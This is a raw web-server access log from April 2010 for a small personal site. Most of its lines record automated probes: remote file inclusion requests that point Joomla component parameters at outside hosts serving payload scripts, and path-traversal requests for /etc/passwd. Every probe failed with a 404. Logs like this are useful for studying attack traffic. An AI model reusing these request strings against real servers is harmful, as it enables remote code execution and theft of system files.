61.67.201.187 - - [19/Apr/2010:12:25:04 -0500] "GET /logs/access_log.1264723200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:12:25:06 -0500] "GET /logs/access_log.1264723200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:12:25:40 -0500] "GET /logs/access_log.1268611200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:11 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.204.241 - - [19/Apr/2010:12:26:18 -0500] "GET /logs/access_log.1174780800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.176.226.170 - - [19/Apr/2010:12:26:25 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:25 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:25 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:35 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:35 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:35 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:45 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:48 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:26:58 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:16 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:47 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:47 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:47 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:49 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:49 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:49 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:52 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:52 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:52 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:59 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:59 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:27:59 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:12:29:17 -0500] "GET /logs/access_log.1263427200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.176.226.170 - - [19/Apr/2010:12:29:56 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:29:56 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:29:56 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:29:59 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:29:59 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:29:59 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:00 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:00 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:00 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:14 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:14 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:14 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:31 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:32 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:33 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:12:30:47 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
63.148.191.224 - - [19/Apr/2010:12:31:53 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.com/search?hl=en&q=costumes+of+nations&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
63.148.191.224 - - [19/Apr/2010:12:31:54 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
63.148.191.224 - - [19/Apr/2010:12:31:54 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
63.148.191.224 - - [19/Apr/2010:12:31:54 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
63.148.191.224 - - [19/Apr/2010:12:31:59 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.34.162.83 - - [19/Apr/2010:12:32:09 -0500] "GET /logs//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:09 -0500] "GET /logs/access_log.1267920000//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 399 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:10 -0500] "GET //component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:11 -0500] "GET //component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:11 -0500] "GET /logs/access_log.1267920000//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 399 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:12 -0500] "GET /logs//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:28 -0500] "GET /logs/access_log.1268265600//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 399 "-""Mozilla/5.0"
64.34.162.83 - - [19/Apr/2010:12:32:30 -0500] "GET /logs/access_log.1268265600//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 399 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:12:33:31 -0500] "GET /logs/access_log.1265328000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [19/Apr/2010:12:33:37 -0500] "GET /bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.239.161.143 - - [19/Apr/2010:12:33:37 -0500] "GET /logs/bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.239.161.143 - - [19/Apr/2010:12:33:37 -0500] "GET /logs/access_log.1225929600/bbs/delete_comment.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.46.13.133 - - [19/Apr/2010:12:33:49 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.83.241.73 - - [19/Apr/2010:12:33:51 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.79"
203.83.241.73 - - [19/Apr/2010:12:33:51 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
203.83.241.73 - - [19/Apr/2010:12:34:11 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
203.83.241.73 - - [19/Apr/2010:12:35:12 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.79"
203.83.241.73 - - [19/Apr/2010:12:35:12 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
203.83.241.73 - - [19/Apr/2010:12:35:18 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.79"
174.136.50.39 - - [19/Apr/2010:12:35:37 -0500] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:35:37 -0500] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:35:37 -0500] "GET /logs/access_log.1270684800%20%20///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 381 "-""Mozilla/5.0"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /logs/principal.php?conteudo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-""-"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /principal.php?conteudo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /logs/access_log.1231718400%20/principal.php?conteudo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""-"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /logs/access_log.1231718400%20/principal.php?conteudo=./../../../../../../../../etc/passwd HTTP/1.1" 404 325 "-""-"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /principal.php?conteudo=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
205.209.53.68 - - [19/Apr/2010:12:36:45 -0500] "GET /logs/principal.php?conteudo=./../../../../../../../../etc/passwd HTTP/1.1" 404 302 "-""-"
203.83.241.73 - - [19/Apr/2010:12:37:13 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.79"
174.136.50.39 - - [19/Apr/2010:12:37:25 -0500] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:37:25 -0500] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:37:25 -0500] "GET /logs/access_log.1270684800%20%20///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 381 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:38:05 -0500] "GET /logs/access_log.1270684800%20%20///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 381 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:38:05 -0500] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:38:05 -0500] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
89.185.253.148 - - [19/Apr/2010:12:38:56 -0500] "GET /index.php?ort=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
89.185.253.148 - - [19/Apr/2010:12:38:56 -0500] "GET /logs/index.php?ort=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
89.185.253.148 - - [19/Apr/2010:12:38:56 -0500] "GET /index.php?ort=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
89.185.253.148 - - [19/Apr/2010:12:38:56 -0500] "GET /logs/index.php?ort=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
87.250.255.243 - - [19/Apr/2010:12:39:32 -0500] "GET /logs/access_log.1270166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [19/Apr/2010:12:40:32 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:12:40:35 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:12:40:35 -0500] "GET /logs/access_log.1219708800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:12:40:36 -0500] "GET /logs/access_log.1220054400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.195.112.180 - - [19/Apr/2010:12:41:07 -0500] "GET /logs/access_log.1226620800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.177.13.130 - - [19/Apr/2010:12:41:35 -0500] "GET //ashnews.php?pathtoashnews=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.177.13.130 - - [19/Apr/2010:12:41:35 -0500] "GET /logs/access_log.1266105600//ashnews.php?pathtoashnews=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.177.13.130 - - [19/Apr/2010:12:41:35 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.191.121.139 - - [19/Apr/2010:12:41:48 -0500] "GET /index.php?meio.php=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
93.191.121.139 - - [19/Apr/2010:12:41:48 -0500] "GET /logs/index.php?meio.php=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
93.191.121.139 - - [19/Apr/2010:12:41:49 -0500] "GET /index.php?meio.php=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
93.191.121.139 - - [19/Apr/2010:12:41:49 -0500] "GET /logs/index.php?meio.php=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
62.67.244.57 - - [19/Apr/2010:12:42:27 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/icon/private_icon/q?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.67.244.57 - - [19/Apr/2010:12:42:27 -0500] "GET /logs/access_log.1268265600//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/icon/private_icon/q?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.67.244.57 - - [19/Apr/2010:12:42:27 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://gonapus.net/zero/icon/private_icon/q?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:42:40 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:42:54 -0500] "GET /logs/access_log.1235779200///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 379 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:43:00 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:43:00 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
